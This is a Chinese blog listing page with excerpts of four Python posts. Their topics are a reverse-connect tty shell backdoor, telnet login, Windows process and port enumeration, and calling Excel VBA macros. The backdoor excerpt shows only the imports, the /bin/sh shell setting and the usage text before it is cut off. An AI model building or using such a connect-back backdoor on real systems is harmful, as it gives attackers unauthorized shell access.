- 博客(4)
- 资源 (51)
- 收藏
- 关注
原创 python编写ttyshell的反向链接后门
<br />#-*- coding: utf-8 -*- import sys import os import socket import pty shell = "/bin/sh" def usage(programname): print "ython connect-back door" print "Usage: %s " % programname def main(): if len(sys.argv) != 3: us
2011-05-18 23:20:00
1016
原创 python远程登录
<br />#-*- coding: utf-8 -*- def telnetdo(HOST = None, USER = None, PASS = None, COMMAND = None): import telnetlib, sys if not HOST: try: HOST = sys.argv[1] USER = sys.argv[2] PASS = sys.argv
2011-05-18 23:18:00
943
原创 枚举M$当前进程和端口
转自 http://wiki.woodpecker.org.cn/moin/MiscItems/2008-04-08 #-*- coding: utf-8 -*- from ctypes import * #PSAPI.DLL psapi = windll.psapi #Kernel32.DLL kernel = windll.kernel32 def EnumProcesses(): arr = c_ulong * 256 lpidProcess= arr()
2011-05-15 22:07:00
747
原创 python调用VBA宏
<br />#-*- encoding: gb2312 -*- import os, shutil, sys import pythoncom from win32com.client import Dispatch #VBA宏参数一 VerInfo = r'宏参数一' #调用接口 def get_data(): print 'Call VBA MACRO start' #EXCEL的地址 file_path = r'c:/test.xls'
2010-09-13 11:07:00
6510
细细品味C#(抽象接口委托反射)(转自博客园)
2011-10-07
适用于GO语言的WIN32下IDE
2011-01-20
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人